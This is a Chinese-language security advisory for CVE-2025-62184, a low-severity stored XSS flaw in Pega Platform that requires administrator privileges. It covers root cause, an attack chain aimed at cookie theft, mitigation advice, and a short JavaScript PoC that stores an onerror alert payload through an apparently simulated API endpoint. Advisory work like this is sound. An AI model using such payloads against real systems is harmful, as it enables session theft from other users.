CVE-2025-62184 CVSS 3.4 低危

CVE-2025-62184 Pega Platform存储型XSS漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-62184

漏洞类型

存储型跨站脚本

CVSS评分

3.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Pega Platform

漏洞概述

Pega Platform 8.1.0至25.1.0版本存在存储型XSS漏洞。该漏洞位于特定用户界面组件，因未充分过滤输入导致。攻击者需拥有管理员权限及广泛访问权限方可利用。成功利用后，恶意脚本会在目标用户浏览受影响页面时执行，导致低级别的机密性信息泄露，但不会影响系统完整性和可用性。

技术细节

该漏洞根因在于Pega Platform受影响版本的用户界面组件未对用户提交的输入进行有效的安全过滤和输出编码。攻击者必须拥有管理员权限及广泛的访问权限，在系统特定功能点输入特制的JavaScript代码（如<script>标签）。这些代码会被持久化存储在后端数据库中。由于CVSS向量显示范围为“已改变”（S:C），恶意脚本的影响范围可能扩展到当前上下文之外，但受限于权限。当其他用户访问该页面时，脚本将在其浏览器中执行。尽管利用门槛较高（需管理员权限和用户交互），攻击者仍可借此窃取受害者的会话凭证或敏感页面信息，造成机密性泄露，但无法直接破坏系统完整性或可用性。

攻击链分析

STEP 1

获取权限

攻击者需要获取Pega Platform的管理员账户权限及广泛的系统访问权限。

STEP 2

构造Payload

攻击者构造包含恶意JavaScript代码的Payload，旨在窃取Cookie或执行未授权操作。

STEP 3

注入Payload

攻击者利用管理员权限，通过存在漏洞的用户界面组件输入并保存恶意Payload。

STEP 4

触发漏洞

当其他管理员或高权限用户访问受影响的组件页面时，浏览器解析并执行恶意脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Example Stored XSS Payload for Pega Platform
// Target: Vulnerable UI Component in versions 8.1.0 to 25.1.0
// Requirements: Administrator privileges

const maliciousPayload = '<img src=x onerror=alert(1)>';

// Simulating an API call to update a vulnerable component
// In a real scenario, the endpoint would be specific to the Pega instance configuration
fetch('/prweb/api/v1/save_component', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <Admin_Token>'
  },
  body: JSON.stringify({
    "componentId": "vulnerable_ui_element",
    "content": maliciousPayload
  })
}).then(response => {
  if(response.ok) console.log('Payload stored successfully');
});

影响范围

Pega Platform 8.1.0 - 25.1.0

防御指南

临时缓解措施

建议尽快应用官方发布的安全补丁进行修复。在补丁部署前，应严格限制管理员账户的使用，并加强Web应用防火墙（WAF）规则以检测和拦截潜在的XSS攻击载荷。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表